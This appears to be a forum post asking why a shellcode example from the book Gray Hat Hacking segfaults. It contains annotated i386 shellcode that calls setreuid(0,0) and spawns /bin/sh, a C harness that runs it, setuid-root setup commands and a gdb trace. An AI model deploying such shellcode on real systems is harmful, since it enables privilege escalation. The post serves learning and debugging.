From Gray Hat Hacking (4th edition), page 146, sc2.c; the code is as follows:
/* i386 Linux shellcode from the book: setreuid(0,0), then execve("/bin//sh", ["/bin//sh"], NULL) */
char sc[] =
    "\x31\xc0"              // xor  %eax,%eax
    "\xb0\x46"              // mov  $0x46,%al        (syscall 70 = setreuid)
    "\x31\xdb"              // xor  %ebx,%ebx        (ruid = 0)
    "\x31\xc9"              // xor  %ecx,%ecx        (euid = 0)
    "\xcd\x80"              // int  $0x80
    "\x31\xc0"              // xor  %eax,%eax
    "\x50"                  // push %eax             (NUL terminator)
    "\x68\x2f\x2f\x73\x68"  // push $0x68732f2f      ("//sh")
    "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f      ("/bin")
    "\x89\xe3"              // mov  %esp,%ebx        (ebx -> "/bin//sh")
    "\x50"                  // push %eax             (argv terminator)
    "\x53"                  // push %ebx             (argv[0])
    "\x89\xe1"              // mov  %esp,%ecx        (ecx -> argv)
    "\x31\xd2"              // xor  %edx,%edx        (envp = NULL)
    "\xb0\x0b"              // mov  $0xb,%al         (syscall 11 = execve)
    "\xcd\x80";             // int  $0x80

int main(void)
{
    void (*fp)(void);
    fp = (void (*)(void)) sc;   /* treat the data array as code */
    fp();                       /* jump into sc[]; this is where the fault occurs */
    return 0;
}
Compile commands:
gcc sc2.c -o sc2
sudo chown root sc2
sudo chmod +s sc2
Compilation result:
It compiles, but it won't run; the error is "段错误 (核心已转储)".
I ran gdb on sc2; the details are as follows:
1. Disassemble main
(gdb) disass main
Dump of assembler code for function main:
0x080483b4 <+0>: push %ebp
0x080483b5 <+1>: mov %esp,%ebp
0x080483b7 <+3>: and $0xfffffff0,%esp
0x080483ba <+6>: sub $0x10,%esp
0x080483bd <+9>: movl $0x804a040,0xc(%esp)
0x080483c5 <+17>: mov 0xc(%esp),%eax
0x080483c9 <+21>: call *%eax
0x080483cb <+23>: leave
0x080483cc <+24>: ret
End of assembler dump.
2. Before executing 0x080483c9 <+21>: call *%eax,
1) Check eax
(gdb) i reg
eax 0x804a040 134520896
.........
2) Check the contents at *(eax):
0x804a040 <sc>: 0x31 0xc0 0xb0 0x46 0x31 0xdb 0x31 0xc9
0x804a048 <sc+8>: 0xcd 0x80 0x31 0xc0 0x50 0x68 0x2f 0x2f
0x804a050 <sc+16>: 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89
0x804a058 <sc+24>: 0xe3 0x50 0x53 0x89 0xe1 0x31 0xd2 0xb0
0x804a060 <sc+32>: 0x0b 0xcd 0x80 0x00 0x00 0x00 0x00 0x00
3) So the contents at *(eax) are exactly the code in the sc[] array, i.e. everything is normal so far
3. Execute call *(eax), i.e. jump to sc[] and execute its first instruction (this is where the error occurs), as follows:
(gdb) stepi
Program received signal SIGSEGV, Segmentation fault.
0x0804a040 in sc ()
1: x/i $pc
=> 0x804a040 <sc>: xor %eax,%eax
Question:
Does anyone know how to get the above code to run properly?
Note:
I looked through the book but didn't see any requirements on the runtime environment. Mine is Linux version 3.2.0, gcc version 4.6.3